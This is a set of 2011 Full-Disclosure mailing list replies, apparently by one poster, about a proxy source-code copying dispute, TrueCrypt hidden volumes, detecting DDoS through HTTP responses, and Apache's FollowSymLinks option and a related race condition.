On Tue, Aug 23, 2011 at 7:49 PM, n...@myproxylists.com wrote: On 8/23/11 6:20 PM, n...@myproxylists.com wrote: This is what you jealous people want to say. I don't care, i don't have any business with glype.com nor with you . Well then I wonder why you made this accusation to public. What comes to proxifying, there are always some similarities. Im little bit upset because you made this false accusation. Anyways, browse this site with the glype proxy: http://midco.net/ it was pretty convincing. You will see it will fail. Try it with my proxy, it opens OK. Simply, if I really would have copied the sources, my software should have the same bugs right? nobody said that you simply copied it: - stealing the glype.com php proxy source-code - modifying it - making your own release obfuscated with sourceguardian - not even saying that's Glype based -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Encrypted files and the 5th amendment
On Wed, Jul 13, 2011 at 12:39 AM, Tim tim-secur...@sentinelchicken.org wrote: Actually, there is no way to tell if the there is another encrypted volume in existence or not. One might stipulate that there could be if the filesize is obvious, but when you get into gig size files that are storing small amounts of data, that argument loses value. Well, yes, if you are trying to hide small amounts of data, then there are many ways to do it with plausible deniability. I thought you were talking about booting entire separate OSes based on boot-time password. Would be hard to hide that amount of data without at least raising suspicion to a determined investigator. Then again, many investigators are not determined. Keep the partition small, put it inside another encrypted partition, maybe they'll miss it. check out the link in the last mail, seems to be what you are looking after. http://www.truecrypt.org/docs/?s=hidden-volume http://www.truecrypt.org/docs/?s=hidden-operating-system -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how to detect DDoS attack through HTTP response analysis(throuput)
2011/6/29 coderman coder...@gmail.com: 2011/6/26 김무성 ki...@infosec.co.kr: ... I'm looking for meterials or information, research about that how to detect DDoS attack through HTTP response analysis(throuput). you're asking the wrong question. instead of asking How can I automagically detect exploitation of my shitty app via HTTP Resp. codes ask: Why is my webapp so shitty that any number of arbitrary requests lead to resource exhaustion? because fetching(or imitating to fetch) the result is always less resource intense than generating it? o_O Tyrael ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FYI: Apache httpd NoFollowSymLink follows symlinks feature
On Fri, Jun 24, 2011 at 5:24 PM, Christian Sciberras uuf6...@gmail.com wrote: I think you meant apache follows symlinks even when -FollowSymLinks is not set. Otherwise it doesn't seem to make sense? -FollowSymLinks turns off the FollowSymLinks option without resetting the other Options. http://wiki.apache.org/httpd/FAQ#Why_do_my_Options_directives_not_have_the_desired_effect.3F Tyrael ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FYI: Apache httpd NoFollowSymLink follows symlinks feature
The FAQ says: You can usually avoid problems by either finding the Options directive that already applies to a specific directory and changing it, or by putting your Options directive inside the most specific possible Directory section. The option is in the most specific directory section and it also takes effect, returning forbidden on http request. But when you use the RenameLoop program in parallel, it fails to detect the symlink and delivers the linked data. This specific TOCTOU issue is known and part of the apache specification. I didn't mean to imply otherwise, I've just explained what does the +/- before an option does. Tyrael ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/